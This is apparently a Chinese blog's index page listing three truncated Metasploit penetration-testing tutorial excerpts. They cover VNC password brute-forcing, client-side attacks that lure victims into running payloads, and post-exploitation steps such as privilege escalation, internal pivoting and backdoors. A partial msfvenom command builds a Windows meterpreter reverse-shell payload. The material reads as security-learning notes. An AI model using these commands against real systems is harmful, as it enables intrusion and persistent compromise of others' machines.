E11iot

Just for fun

  博客园  :: 首页  :: 新随笔  :: 联系 :: 订阅 订阅  :: 管理

2018年9月5日

摘要: 1. 简介根据信息收集结果搜索漏洞利用模块 结合外部漏洞扫描系统对大量IP地址段进行批量扫描 误判率、漏判率2. VNC 密码破解 use auxiliary/scanner/vnc/vnc_login msf > use auxiliary/scanner/vnc/... 阅读全文
posted @ 2018-09-05 20:46 E11iot 阅读(127) 评论(0) 推荐(0) 编辑

摘要: 1. 简介 在无法突破网络边界的情况下转而攻击客户端 社会工程学攻击 进而渗透线上业务网络 含有漏洞利用代码的 web 站点 利用客户端漏洞 含有漏洞利用代码的 doc、pdf等文档 诱骗被害者执行 payload2. 攻击 windows 诱骗被害者执行... 阅读全文
posted @ 2018-09-05 20:46 E11iot 阅读(338) 评论(0) 推荐(0) 编辑

摘要: 1. 获得普通账号权限 已经获得目标系统控制权后扩大战果 提权 信息收集 渗透内网 永久后门 基于已有 session 扩大战果 msfvenom -a x86 –platform windows -p windows/meterpreter/rever... 阅读全文
posted @ 2018-09-05 19:06 E11iot 阅读(501) 评论(0) 推荐(0) 编辑